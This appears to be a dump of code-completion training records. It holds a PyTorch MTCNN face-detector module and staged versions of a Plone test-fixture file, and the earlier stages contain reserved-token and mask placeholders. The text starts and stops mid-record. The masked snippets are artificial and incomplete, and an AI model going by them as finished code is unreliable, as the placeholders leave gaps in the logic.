"step-5": "import numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import interpolate\nfrom torchvision.ops.boxes import batched_nms\n\n\nclass MTCNN():\n\tdef __init__(self, device=None, model=None):\n\t\tif device is None:\n\t\t\tdevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\t\tself.device = device\n\n\t\turl = 'https://github.com/deepware/dFace/raw/master/models/mtcnn.pt'\n\t\tif model is None:\n\t\t\tmodel = torch.hub.load_state_dict_from_url(url)\n\t\telse:\n\t\t\tmodel = torch.load(model, map_location=device)\n\n\t\tself.pnet = PNet().to(device)\n\t\tself.rnet = RNet().to(device)\n\t\tself.onet = ONet().to(device)\n\n\t\tself.pnet.load_state_dict(model['pnet'])\n\t\tself.rnet.load_state_dict(model['rnet'])\n\t\tself.onet.load_state_dict(model['onet'])\n\n\n\tdef detect(self, imgs, minsize=None):\n\t\tif len(imgs) == 0:\n\t\t\treturn []\n\n\t\tif isinstance(imgs[0], np.ndarray):\n\t\t\th, w = imgs[0].shape[:2]\n\t\telse:\n\t\t\tw, h = imgs[0].size\n\n\t\tif minsize is None:\n\t\t\tminsize = max(96 * min(w, h)/1080, 40)\n\n\t\tboxes, points = [], []\n\n\t\twith torch.no_grad():\n\t\t\tbatches = [imgs[i:i+10] for i in range(0, len(imgs), 10)]\n\t\t\tfor batch in batches:\n\t\t\t\tbatch_boxes, batch_points = detect_face(\n\t\t\t\t\tbatch, minsize, self.pnet, self.rnet, self.onet,\n\t\t\t\t\t[0.7, 0.8, 0.9], 0.709, self.device)\n\t\t\t\tboxes += list(batch_boxes)\n\t\t\t\tpoints += list(batch_points)\n\n\t\tresult = []\n\t\tfor box, point in zip(boxes, points):\n\t\t\tbox = np.array(box)\n\t\t\tpoint = np.array(point)\n\t\t\tif len(box) == 0:\n\t\t\t\tresult.append(None)\n\t\t\telse:\n\t\t\t\tresult.append((box[:, :4], box[:, 4], point))\n\t\treturn result\n\n\ndef empty_cache(device):\n\tif 'cuda' in device:\n\t\twith torch.cuda.device(device):\n\t\t\ttorch.cuda.empty_cache()\n\n\nclass PNet(nn.Module):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.conv1 = nn.Conv2d(3, 10, kernel_size=3)\n\t\tself.prelu1 = nn.PReLU(10)\n\t\tself.pool1 = nn.MaxPool2d(2, 2, ceil_mode=True)\n\t\tself.conv2 = nn.Conv2d(10, 16, kernel_size=3)\n\t\tself.prelu2 = nn.PReLU(16)\n\t\tself.conv3 = nn.Conv2d(16, 32, kernel_size=3)\n\t\tself.prelu3 = nn.PReLU(32)\n\t\tself.conv4_1 = nn.Conv2d(32, 2, kernel_size=1)\n\t\tself.softmax4_1 = nn.Softmax(dim=1)\n\t\tself.conv4_2 = nn.Conv2d(32, 4, kernel_size=1)\n\n\tdef forward(self, x):\n\t\tx = self.conv1(x)\n\t\tx = self.prelu1(x)\n\t\tx = self.pool1(x)\n\t\tx = self.conv2(x)\n\t\tx = self.prelu2(x)\n\t\tx = self.conv3(x)\n\t\tx = self.prelu3(x)\n\t\ta = self.conv4_1(x)\n\t\ta = self.softmax4_1(a)\n\t\tb = self.conv4_2(x)\n\t\treturn b, a\n\n\nclass RNet(nn.Module):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.conv1 = nn.Conv2d(3, 28, kernel_size=3)\n\t\tself.prelu1 = nn.PReLU(28)\n\t\tself.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n\t\tself.conv2 = nn.Conv2d(28, 48, kernel_size=3)\n\t\tself.prelu2 = nn.PReLU(48)\n\t\tself.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n\t\tself.conv3 = nn.Conv2d(48, 64, kernel_size=2)\n\t\tself.prelu3 = nn.PReLU(64)\n\t\tself.dense4 = nn.Linear(576, 128)\n\t\tself.prelu4 = nn.PReLU(128)\n\t\tself.dense5_1 = nn.Linear(128, 2)\n\t\tself.softmax5_1 = nn.Softmax(dim=1)\n\t\tself.dense5_2 = nn.Linear(128, 4)\n\n\tdef forward(self, x):\n\t\tx = self.conv1(x)\n\t\tx = self.prelu1(x)\n\t\tx = self.pool1(x)\n\t\tx = self.conv2(x)\n\t\tx = self.prelu2(x)\n\t\tx = self.pool2(x)\n\t\tx = self.conv3(x)\n\t\tx = self.prelu3(x)\n\t\tx = x.permute(0, 3, 2, 1).contiguous()\n\t\tx = self.dense4(x.view(x.shape[0], -1))\n\t\tx = self.prelu4(x)\n\t\ta = self.dense5_1(x)\n\t\ta = self.softmax5_1(a)\n\t\tb = self.dense5_2(x)\n\t\treturn b, a\n\n\nclass ONet(nn.Module):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.conv1 = nn.Conv2d(3, 32, kernel_size=3)\n\t\tself.prelu1 = nn.PReLU(32)\n\t\tself.pool1 = nn.MaxPool2d(3, 2, ceil_mode=True)\n\t\tself.conv2 = nn.Conv2d(32, 64, kernel_size=3)\n\t\tself.prelu2 = nn.PReLU(64)\n\t\tself.pool2 = nn.MaxPool2d(3, 2, ceil_mode=True)\n\t\tself.conv3 = nn.Conv2d(64, 64, kernel_size=3)\n\t\tself.prelu3 = nn.PReLU(64)\n\t\tself.pool3 = nn.MaxPool2d(2, 2, ceil_mode=True)\n\t\tself.conv4 = nn.Conv2d(64, 128, kernel_size=2)\n\t\tself.prelu4 = nn.PReLU(128)\n\t\tself.dense5 = nn.Linear(1152, 256)\n\t\tself.prelu5 = nn.PReLU(256)\n\t\tself.dense6_1 = nn.Linear(256, 2)\n\t\tself.softmax6_1 = nn.Softmax(dim=1)\n\t\tself.dense6_2 = nn.Linear(256, 4)\n\t\tself.dense6_3 = nn.Linear(256, 10)\n\n\tdef forward(self, x):\n\t\tx = self.conv1(x)\n\t\tx = self.prelu1(x)\n\t\tx = self.pool1(x)\n\t\tx = self.conv2(x)\n\t\tx = self.prelu2(x)\n\t\tx = self.pool2(x)\n\t\tx = self.conv3(x)\n\t\tx = self.prelu3(x)\n\t\tx = self.pool3(x)\n\t\tx = self.conv4(x)\n\t\tx = self.prelu4(x)\n\t\tx = x.permute(0, 3, 2, 1).contiguous()\n\t\tx = self.dense5(x.view(x.shape[0], -1))\n\t\tx = self.prelu5(x)\n\t\ta = self.dense6_1(x)\n\t\ta = self.softmax6_1(a)\n\t\tb = self.dense6_2(x)\n\t\tc = self.dense6_3(x)\n\t\treturn b, c, a\n\n\ndef detect_face(imgs, minsize, pnet, rnet, onet, threshold, factor, device):\n\tif isinstance(imgs, (np.ndarray, torch.Tensor)):\n\t\timgs = torch.as_tensor(imgs, device=device)\n\t\tif len(imgs.shape) == 3:\n\t\t\timgs = imgs.unsqueeze(0)\n\telse:\n\t\tif not isinstance(imgs, (list, tuple)):\n\t\t\timgs = [imgs]\n\t\tif any(img.size != imgs[0].size for img in imgs):\n\t\t\traise Exception(\"MTCNN batch processing only compatible with equal-dimension images.\")\n\t\timgs = np.stack([np.uint8(img) for img in imgs])\n\n\timgs = torch.as_tensor(imgs, device=device)\n\n\tmodel_dtype = next(pnet.parameters()).dtype\n\timgs = imgs.permute(0, 3, 1, 2).type(model_dtype)\n\n\tbatch_size = len(imgs)\n\th, w = imgs.shape[2:4]\n\tm = 12.0 / minsize\n\tminl = min(h, w)\n\tminl = minl * m\n\n\t# Create scale pyramid\n\tscale_i = m\n\tscales = []\n\twhile minl >= 12:\n\t\tscales.append(scale_i)\n\t\tscale_i = scale_i * factor\n\t\tminl = minl * factor\n\n\t# First stage\n\tboxes = []\n\timage_inds = []\n\tall_inds = []\n\tall_i = 0\n\tfor scale in scales:\n\t\tim_data = imresample(imgs, (int(h * scale + 1), int(w * scale + 1)))\n\t\tim_data = (im_data - 127.5) * 0.0078125\n\t\treg, probs = pnet(im_data)\n\t\tempty_cache(device)\n\t\tboxes_scale, image_inds_scale = generateBoundingBox(reg, probs[:, 1], scale, threshold[0])\n\t\tboxes.append(boxes_scale)\n\t\timage_inds.append(image_inds_scale)\n\t\tall_inds.append(all_i + image_inds_scale)\n\t\tall_i += batch_size\n\n\tboxes = torch.cat(boxes, dim=0)\n\timage_inds = torch.cat(image_inds, dim=0).cpu()\n\tall_inds = torch.cat(all_inds, dim=0)\n\n\t# NMS within each scale + image\n\tpick = batched_nms(boxes[:, :4], boxes[:, 4], all_inds, 0.5)\n\tboxes, image_inds = boxes[pick], image_inds[pick]\n\n\t# NMS within each image\n\tpick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)\n\tboxes, image_inds = boxes[pick], image_inds[pick]\n\n\tregw = boxes[:, 2] - boxes[:, 0]\n\tregh = boxes[:, 3] - boxes[:, 1]\n\tqq1 = boxes[:, 0] + boxes[:, 5] * regw\n\tqq2 = boxes[:, 1] + boxes[:, 6] * regh\n\tqq3 = boxes[:, 2] + boxes[:, 7] * regw\n\tqq4 = boxes[:, 3] + boxes[:, 8] * regh\n\tboxes = torch.stack([qq1, qq2, qq3, qq4, boxes[:, 4]]).permute(1, 0)\n\tboxes = rerec(boxes)\n\ty, ey, x, ex = pad(boxes, w, h)\n\n\t# Second stage\n\tif len(boxes) > 0:\n\t\tim_data = []\n\t\tfor k in range(len(y)):\n\t\t\tif ey[k] > (y[k] - 1) and ex[k] > (x[k] - 1):\n\t\t\t\timg_k = imgs[image_inds[k], :, (y[k] - 1):ey[k], (x[k] - 1):ex[k]].unsqueeze(0)\n\t\t\t\tim_data.append(imresample(img_k, (24, 24)))\n\t\tim_data = torch.cat(im_data, dim=0)\n\t\tim_data = (im_data - 127.5) * 0.0078125\n\n\t\tout = []\n\t\tfor batch in im_data.split(2000):\n\t\t\tout += [rnet(batch)]\n\t\tz = list(zip(*out))\n\t\tout = (torch.cat(z[0]), torch.cat(z[1]))\n\t\tempty_cache(device)\n\n\t\tout0 = out[0].permute(1, 0)\n\t\tout1 = out[1].permute(1, 0)\n\t\tscore = out1[1, :]\n\t\tipass = score > threshold[1]\n\t\tboxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)\n\t\timage_inds = image_inds[ipass]\n\t\tmv = out0[:, ipass].permute(1, 0)\n\n\t\t# NMS within each image\n\t\tpick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)\n\t\tboxes, image_inds, mv = boxes[pick], image_inds[pick], mv[pick]\n\t\tboxes = bbreg(boxes, mv)\n\t\tboxes = rerec(boxes)\n\n\t# Third stage\n\tpoints = torch.zeros(0, 5, 2, device=device)\n\tif len(boxes) > 0:\n\t\ty, ey, x, ex = pad(boxes, w, h)\n\t\tim_data = []\n\t\tfor k in range(len(y)):\n\t\t\tif ey[k] > (y[k] - 1) and ex[k] > (x[k] - 1):\n\t\t\t\timg_k = imgs[image_inds[k], :, (y[k] - 1):ey[k], (x[k] - 1):ex[k]].unsqueeze(0)\n\t\t\t\tim_data.append(imresample(img_k, (48, 48)))\n\t\tim_data = torch.cat(im_data, dim=0)\n\t\tim_data = (im_data - 127.5) * 0.0078125\n\n\t\tout = []\n\t\tfor batch in im_data.split(500):\n\t\t\tout += [onet(batch)]\n\t\tz = list(zip(*out))\n\t\tout = (torch.cat(z[0]), torch.cat(z[1]), torch.cat(z[2]))\n\t\tempty_cache(device)\n\n\t\tout0 = out[0].permute(1, 0)\n\t\tout1 = out[1].permute(1, 0)\n\t\tout2 = out[2].permute(1, 0)\n\t\tscore = out2[1, :]\n\t\tpoints = out1\n\t\tipass = score > threshold[2]\n\t\tpoints = points[:, ipass]\n\t\tboxes = torch.cat((boxes[ipass, :4], score[ipass].unsqueeze(1)), dim=1)\n\t\timage_inds = image_inds[ipass]\n\t\tmv = out0[:, ipass].permute(1, 0)\n\n\t\tw_i = boxes[:, 2] - boxes[:, 0] + 1\n\t\th_i = boxes[:, 3] - boxes[:, 1] + 1\n\t\tpoints_x = w_i.repeat(5, 1) * points[:5, :] + boxes[:, 0].repeat(5, 1) - 1\n\t\tpoints_y = h_i.repeat(5, 1) * points[5:10, :] + boxes[:, 1].repeat(5, 1) - 1\n\t\tpoints = torch.stack((points_x, points_y)).permute(2, 1, 0)\n\t\tboxes = bbreg(boxes, mv)\n\n\t\t# NMS within each image using \"Min\" strategy\n\t\t# pick = batched_nms(boxes[:, :4], boxes[:, 4], image_inds, 0.7)\n\t\tpick = batched_nms_numpy(boxes[:, :4], boxes[:, 4], image_inds, 0.7, 'Min')\n\t\tboxes, image_inds, points = boxes[pick], image_inds[pick], points[pick]\n\n\tboxes = boxes.cpu().numpy()\n\tpoints = points.cpu().numpy()\n\n\tbatch_boxes = []\n\tbatch_points = []\n\tfor b_i in range(batch_size):\n\t\tb_i_inds = np.where(image_inds == b_i)\n\t\tbatch_boxes.append(boxes[b_i_inds].copy())\n\t\tbatch_points.append(points[b_i_inds].copy())\n\n\tbatch_boxes, batch_points = np.array(batch_boxes), np.array(batch_points)\n\tempty_cache(device)\n\n\treturn batch_boxes, batch_points\n\n\ndef bbreg(boundingbox, reg):\n\tif reg.shape[1] == 1:\n\t\treg = torch.reshape(reg, (reg.shape[2], reg.shape[3]))\n\n\tw = boundingbox[:, 2] - boundingbox[:, 0] + 1\n\th = boundingbox[:, 3] - boundingbox[:, 1] + 1\n\tb1 = boundingbox[:, 0] + reg[:, 0] * w\n\tb2 = boundingbox[:, 1] + reg[:, 1] * h\n\tb3 = boundingbox[:, 2] + reg[:, 2] * w\n\tb4 = boundingbox[:, 3] + reg[:, 3] * h\n\tboundingbox[:, :4] = torch.stack([b1, b2, b3, b4]).permute(1, 0)\n\n\treturn boundingbox\n\n\ndef generateBoundingBox(reg, probs, scale, thresh):\n\tstride = 2\n\tcellsize = 12\n\n\treg = reg.permute(1, 0, 2, 3)\n\n\tmask = probs >= thresh\n\tmask_inds = mask.nonzero(as_tuple=False)\n\timage_inds = mask_inds[:, 0]\n\tscore = probs[mask]\n\treg = reg[:, mask].permute(1, 0)\n\tbb = mask_inds[:, 1:].type(reg.dtype).flip(1)\n\tq1 = ((stride * bb + 1) / scale).floor()\n\tq2 = ((stride * bb + cellsize - 1 + 1) / scale).floor()\n\tboundingbox = torch.cat([q1, q2, score.unsqueeze(1), reg], dim=1)\n\treturn boundingbox, image_inds\n\n\ndef nms_numpy(boxes, scores, threshold, method):\n\tif boxes.size == 0:\n\t\treturn np.empty((0, 3))\n\n\tx1 = boxes[:, 0].copy()\n\ty1 = boxes[:, 1].copy()\n\tx2 = boxes[:, 2].copy()\n\ty2 = boxes[:, 3].copy()\n\ts = scores\n\tarea = (x2 - x1 + 1) * (y2 - y1 + 1)\n\n\tI = np.argsort(s)\n\tpick = np.zeros_like(s, dtype=np.int16)\n\tcounter = 0\n\twhile I.size > 0:\n\t\ti = I[-1]\n\t\tpick[counter] = i\n\t\tcounter += 1\n\t\tidx = I[0:-1]\n\n\t\txx1 = np.maximum(x1[i], x1[idx]).copy()\n\t\tyy1 = np.maximum(y1[i], y1[idx]).copy()\n\t\txx2 = np.minimum(x2[i], x2[idx]).copy()\n\t\tyy2 = np.minimum(y2[i], y2[idx]).copy()\n\n\t\tw = np.maximum(0.0, xx2 - xx1 + 1).copy()\n\t\th = np.maximum(0.0, yy2 - yy1 + 1).copy()\n\n\t\tinter = w * h\n\t\tif method == \"Min\":\n\t\t\to = inter / np.minimum(area[i], area[idx])\n\t\telse:\n\t\t\to = inter / (area[i] + area[idx] - inter)\n\t\tI = I[np.where(o <= threshold)]\n\n\tpick = pick[:counter].copy()\n\treturn pick\n\n\ndef batched_nms_numpy(boxes, scores, idxs, threshold, method):\n\tdevice = boxes.device\n\tif boxes.numel() == 0:\n\t\treturn torch.empty((0,), dtype=torch.int64, device=device)\n\t# strategy: in order to perform NMS independently per class.\n\t# we add an offset to all the boxes. The offset is dependent\n\t# only on the class idx, and is large enough so that boxes\n\t# from different classes do not overlap\n\tmax_coordinate = boxes.max()\n\toffsets = idxs.to(boxes) * (max_coordinate + 1)\n\tboxes_for_nms = boxes + offsets[:, None]\n\tboxes_for_nms = boxes_for_nms.cpu().numpy()\n\tscores = scores.cpu().numpy()\n\tkeep = nms_numpy(boxes_for_nms, scores, threshold, method)\n\treturn torch.as_tensor(keep, dtype=torch.long, device=device)\n\n\ndef pad(boxes, w, h):\n\tboxes = boxes.trunc().int().cpu().numpy()\n\tx = boxes[:, 0]\n\ty = boxes[:, 1]\n\tex = boxes[:, 2]\n\tey = boxes[:, 3]\n\n\tx[x < 1] = 1\n\ty[y < 1] = 1\n\tex[ex > w] = w\n\tey[ey > h] = h\n\n\treturn y, ey, x, ex\n\n\ndef rerec(bboxA):\n\th = bboxA[:, 3] - bboxA[:, 1]\n\tw = bboxA[:, 2] - bboxA[:, 0]\n\n\tl = torch.max(w, h)\n\tbboxA[:, 0] = bboxA[:, 0] + w * 0.5 - l * 0.5\n\tbboxA[:, 1] = bboxA[:, 1] + h * 0.5 - l * 0.5\n\tbboxA[:, 2:4] = bboxA[:, :2] + l.repeat(2, 1).permute(1, 0)\n\n\treturn bboxA\n\n\ndef imresample(img, sz):\n\tim_data = interpolate(img, size=sz, mode=\"area\")\n\treturn im_data",
"step-ids": [
17,
18,
19,
21,
23
]
}
|
[
17,
18,
19,
21,
23
] |
<|reserved_special_token_0|>
class OiRAFixture(PloneSandboxLayer):
<|reserved_special_token_0|>
def setUpZope(self, app, configurationContext):
z2.installProduct(app, 'Products.membrane')
z2.installProduct(app, 'Products.statusmessages')
import Products.statusmessages
xmlconfig.file('configure.zcml', Products.statusmessages, context=
configurationContext)
import Products.membrane
xmlconfig.file('configure.zcml', Products.membrane, context=
configurationContext)
import euphorie.client.tests
xmlconfig.file('configure.zcml', euphorie.client.tests, context=
configurationContext)
import osha.oira
xmlconfig.file('configure.zcml', osha.oira, context=
configurationContext)
def setUpPloneSite(self, portal):
wftool = api.portal.get_tool(name='portal_workflow')
wftool.setDefaultChain('plone_workflow')
applyProfile(portal, 'euphorie.content:default')
applyProfile(portal, 'euphorie.client:default')
applyProfile(portal, 'euphorie.deployment:default')
applyProfile(portal, 'osha.oira:default')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OiRAFixture(PloneSandboxLayer):
defaultBases = PLONE_FIXTURE,
def setUpZope(self, app, configurationContext):
z2.installProduct(app, 'Products.membrane')
z2.installProduct(app, 'Products.statusmessages')
import Products.statusmessages
xmlconfig.file('configure.zcml', Products.statusmessages, context=
configurationContext)
import Products.membrane
xmlconfig.file('configure.zcml', Products.membrane, context=
configurationContext)
import euphorie.client.tests
xmlconfig.file('configure.zcml', euphorie.client.tests, context=
configurationContext)
import osha.oira
xmlconfig.file('configure.zcml', osha.oira, context=
configurationContext)
def setUpPloneSite(self, portal):
wftool = api.portal.get_tool(name='portal_workflow')
wftool.setDefaultChain('plone_workflow')
applyProfile(portal, 'euphorie.content:default')
applyProfile(portal, 'euphorie.client:default')
applyProfile(portal, 'euphorie.deployment:default')
applyProfile(portal, 'osha.oira:default')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OiRAFixture(PloneSandboxLayer):
defaultBases = PLONE_FIXTURE,
def setUpZope(self, app, configurationContext):
z2.installProduct(app, 'Products.membrane')
z2.installProduct(app, 'Products.statusmessages')
import Products.statusmessages
xmlconfig.file('configure.zcml', Products.statusmessages, context=
configurationContext)
import Products.membrane
xmlconfig.file('configure.zcml', Products.membrane, context=
configurationContext)
import euphorie.client.tests
xmlconfig.file('configure.zcml', euphorie.client.tests, context=
configurationContext)
import osha.oira
xmlconfig.file('configure.zcml', osha.oira, context=
configurationContext)
def setUpPloneSite(self, portal):
wftool = api.portal.get_tool(name='portal_workflow')
wftool.setDefaultChain('plone_workflow')
applyProfile(portal, 'euphorie.content:default')
applyProfile(portal, 'euphorie.client:default')
applyProfile(portal, 'euphorie.deployment:default')
applyProfile(portal, 'osha.oira:default')
OIRA_FIXTURE = OiRAFixture()
OIRA_INTEGRATION_TESTING = IntegrationTesting(bases=(OIRA_FIXTURE,), name=
'osha.oira:Integration')
OIRA_SUITE_ROBOT = FunctionalTesting(bases=(OIRA_FIXTURE,
AUTOLOGIN_LIBRARY_FIXTURE, z2.ZSERVER_FIXTURE), name='OIRA_SUITE_ROBOT')
<|reserved_special_token_1|>
from plone import api
from plone.app.robotframework.testing import AUTOLOGIN_LIBRARY_FIXTURE
from plone.app.testing import applyProfile
from plone.app.testing import FunctionalTesting
from plone.app.testing import IntegrationTesting
from plone.app.testing import PLONE_FIXTURE
from plone.app.testing import PloneSandboxLayer
from plone.testing import z2
from zope.configuration import xmlconfig
class OiRAFixture(PloneSandboxLayer):
defaultBases = PLONE_FIXTURE,
def setUpZope(self, app, configurationContext):
z2.installProduct(app, 'Products.membrane')
z2.installProduct(app, 'Products.statusmessages')
import Products.statusmessages
xmlconfig.file('configure.zcml', Products.statusmessages, context=
configurationContext)
import Products.membrane
xmlconfig.file('configure.zcml', Products.membrane, context=
configurationContext)
import euphorie.client.tests
xmlconfig.file('configure.zcml', euphorie.client.tests, context=
configurationContext)
import osha.oira
xmlconfig.file('configure.zcml', osha.oira, context=
configurationContext)
def setUpPloneSite(self, portal):
wftool = api.portal.get_tool(name='portal_workflow')
wftool.setDefaultChain('plone_workflow')
applyProfile(portal, 'euphorie.content:default')
applyProfile(portal, 'euphorie.client:default')
applyProfile(portal, 'euphorie.deployment:default')
applyProfile(portal, 'osha.oira:default')
OIRA_FIXTURE = OiRAFixture()
OIRA_INTEGRATION_TESTING = IntegrationTesting(bases=(OIRA_FIXTURE,), name=
'osha.oira:Integration')
OIRA_SUITE_ROBOT = FunctionalTesting(bases=(OIRA_FIXTURE,
AUTOLOGIN_LIBRARY_FIXTURE, z2.ZSERVER_FIXTURE), name='OIRA_SUITE_ROBOT')
<|reserved_special_token_1|>
from plone import api
from plone.app.robotframework.testing import AUTOLOGIN_LIBRARY_FIXTURE
from plone.app.testing import applyProfile
from plone.app.testing import FunctionalTesting
from plone.app.testing import IntegrationTesting
from plone.app.testing import PLONE_FIXTURE
from plone.app.testing import PloneSandboxLayer
from plone.testing import z2
from zope.configuration import xmlconfig
class OiRAFixture(PloneSandboxLayer):
defaultBases = (PLONE_FIXTURE,)
def setUpZope(self, app, configurationContext):
z2.installProduct(app, 'Products.membrane')
z2.installProduct(app, 'Products.statusmessages')
import Products.statusmessages
xmlconfig.file('configure.zcml',
Products.statusmessages,
context=configurationContext)
import Products.membrane
xmlconfig.file('configure.zcml',
Products.membrane,
context=configurationContext)
import euphorie.client.tests
xmlconfig.file("configure.zcml",
euphorie.client.tests,
context=configurationContext)
import osha.oira
xmlconfig.file('configure.zcml',
osha.oira,
context=configurationContext)
def setUpPloneSite(self, portal):
wftool = api.portal.get_tool(name='portal_workflow')
wftool.setDefaultChain('plone_workflow')
applyProfile(portal, 'euphorie.content:default')
applyProfile(portal, 'euphorie.client:default')
applyProfile(portal, 'euphorie.deployment:default')
applyProfile(portal, 'osha.oira:default')
OIRA_FIXTURE = OiRAFixture()
OIRA_INTEGRATION_TESTING = \
IntegrationTesting(
bases=(OIRA_FIXTURE,),
name="osha.oira:Integration"
)
OIRA_SUITE_ROBOT = FunctionalTesting(
bases=(OIRA_FIXTURE,
AUTOLOGIN_LIBRARY_FIXTURE,
z2.ZSERVER_FIXTURE),
name="OIRA_SUITE_ROBOT")
|
flexible
|
{
"blob_id": "eec2b818ea9d50161bad60e8bf83dcb7ce9bf9fa",
"index": 7428,
"step-1": "<mask token>\n\n\nclass OiRAFixture(PloneSandboxLayer):\n <mask token>\n\n def setUpZope(self, app, configurationContext):\n z2.installProduct(app, 'Products.membrane')\n z2.installProduct(app, 'Products.statusmessages')\n import Products.statusmessages\n xmlconfig.file('configure.zcml', Products.statusmessages, context=\n configurationContext)\n import Products.membrane\n xmlconfig.file('configure.zcml', Products.membrane, context=\n configurationContext)\n import euphorie.client.tests\n xmlconfig.file('configure.zcml', euphorie.client.tests, context=\n configurationContext)\n import osha.oira\n xmlconfig.file('configure.zcml', osha.oira, context=\n configurationContext)\n\n def setUpPloneSite(self, portal):\n wftool = api.portal.get_tool(name='portal_workflow')\n wftool.setDefaultChain('plone_workflow')\n applyProfile(portal, 'euphorie.content:default')\n applyProfile(portal, 'euphorie.client:default')\n applyProfile(portal, 'euphorie.deployment:default')\n applyProfile(portal, 'osha.oira:default')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass OiRAFixture(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n z2.installProduct(app, 'Products.membrane')\n z2.installProduct(app, 'Products.statusmessages')\n import Products.statusmessages\n xmlconfig.file('configure.zcml', Products.statusmessages, context=\n configurationContext)\n import Products.membrane\n xmlconfig.file('configure.zcml', Products.membrane, context=\n configurationContext)\n import euphorie.client.tests\n xmlconfig.file('configure.zcml', euphorie.client.tests, context=\n configurationContext)\n import osha.oira\n xmlconfig.file('configure.zcml', osha.oira, context=\n configurationContext)\n\n def setUpPloneSite(self, portal):\n wftool = api.portal.get_tool(name='portal_workflow')\n wftool.setDefaultChain('plone_workflow')\n applyProfile(portal, 'euphorie.content:default')\n applyProfile(portal, 'euphorie.client:default')\n applyProfile(portal, 'euphorie.deployment:default')\n applyProfile(portal, 'osha.oira:default')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass OiRAFixture(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n z2.installProduct(app, 'Products.membrane')\n z2.installProduct(app, 'Products.statusmessages')\n import Products.statusmessages\n xmlconfig.file('configure.zcml', Products.statusmessages, context=\n configurationContext)\n import Products.membrane\n xmlconfig.file('configure.zcml', Products.membrane, context=\n configurationContext)\n import euphorie.client.tests\n xmlconfig.file('configure.zcml', euphorie.client.tests, context=\n configurationContext)\n import osha.oira\n xmlconfig.file('configure.zcml', osha.oira, context=\n configurationContext)\n\n def setUpPloneSite(self, portal):\n wftool = api.portal.get_tool(name='portal_workflow')\n wftool.setDefaultChain('plone_workflow')\n applyProfile(portal, 'euphorie.content:default')\n applyProfile(portal, 'euphorie.client:default')\n applyProfile(portal, 'euphorie.deployment:default')\n applyProfile(portal, 'osha.oira:default')\n\n\nOIRA_FIXTURE = OiRAFixture()\nOIRA_INTEGRATION_TESTING = IntegrationTesting(bases=(OIRA_FIXTURE,), name=\n 'osha.oira:Integration')\nOIRA_SUITE_ROBOT = FunctionalTesting(bases=(OIRA_FIXTURE,\n AUTOLOGIN_LIBRARY_FIXTURE, z2.ZSERVER_FIXTURE), name='OIRA_SUITE_ROBOT')\n",
"step-4": "from plone import api\nfrom plone.app.robotframework.testing import AUTOLOGIN_LIBRARY_FIXTURE\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.testing import z2\nfrom zope.configuration import xmlconfig\n\n\nclass OiRAFixture(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n z2.installProduct(app, 'Products.membrane')\n z2.installProduct(app, 'Products.statusmessages')\n import Products.statusmessages\n xmlconfig.file('configure.zcml', Products.statusmessages, context=\n configurationContext)\n import Products.membrane\n xmlconfig.file('configure.zcml', Products.membrane, context=\n configurationContext)\n import euphorie.client.tests\n xmlconfig.file('configure.zcml', euphorie.client.tests, context=\n configurationContext)\n import osha.oira\n xmlconfig.file('configure.zcml', osha.oira, context=\n configurationContext)\n\n def setUpPloneSite(self, portal):\n wftool = api.portal.get_tool(name='portal_workflow')\n wftool.setDefaultChain('plone_workflow')\n applyProfile(portal, 'euphorie.content:default')\n applyProfile(portal, 'euphorie.client:default')\n applyProfile(portal, 'euphorie.deployment:default')\n applyProfile(portal, 'osha.oira:default')\n\n\nOIRA_FIXTURE = OiRAFixture()\nOIRA_INTEGRATION_TESTING = IntegrationTesting(bases=(OIRA_FIXTURE,), name=\n 'osha.oira:Integration')\nOIRA_SUITE_ROBOT = FunctionalTesting(bases=(OIRA_FIXTURE,\n AUTOLOGIN_LIBRARY_FIXTURE, z2.ZSERVER_FIXTURE), name='OIRA_SUITE_ROBOT')\n",
"step-5": "from plone import api\nfrom plone.app.robotframework.testing import AUTOLOGIN_LIBRARY_FIXTURE\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.testing import z2\nfrom zope.configuration import xmlconfig\n\n\nclass OiRAFixture(PloneSandboxLayer):\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n z2.installProduct(app, 'Products.membrane')\n z2.installProduct(app, 'Products.statusmessages')\n import Products.statusmessages\n xmlconfig.file('configure.zcml',\n Products.statusmessages,\n context=configurationContext)\n import Products.membrane\n xmlconfig.file('configure.zcml',\n Products.membrane,\n context=configurationContext)\n import euphorie.client.tests\n xmlconfig.file(\"configure.zcml\",\n euphorie.client.tests,\n context=configurationContext)\n import osha.oira\n xmlconfig.file('configure.zcml',\n osha.oira,\n context=configurationContext)\n\n def setUpPloneSite(self, portal):\n wftool = api.portal.get_tool(name='portal_workflow')\n wftool.setDefaultChain('plone_workflow')\n applyProfile(portal, 'euphorie.content:default')\n applyProfile(portal, 'euphorie.client:default')\n applyProfile(portal, 'euphorie.deployment:default')\n applyProfile(portal, 'osha.oira:default')\n\nOIRA_FIXTURE = OiRAFixture()\nOIRA_INTEGRATION_TESTING = \\\n IntegrationTesting(\n bases=(OIRA_FIXTURE,),\n name=\"osha.oira:Integration\"\n 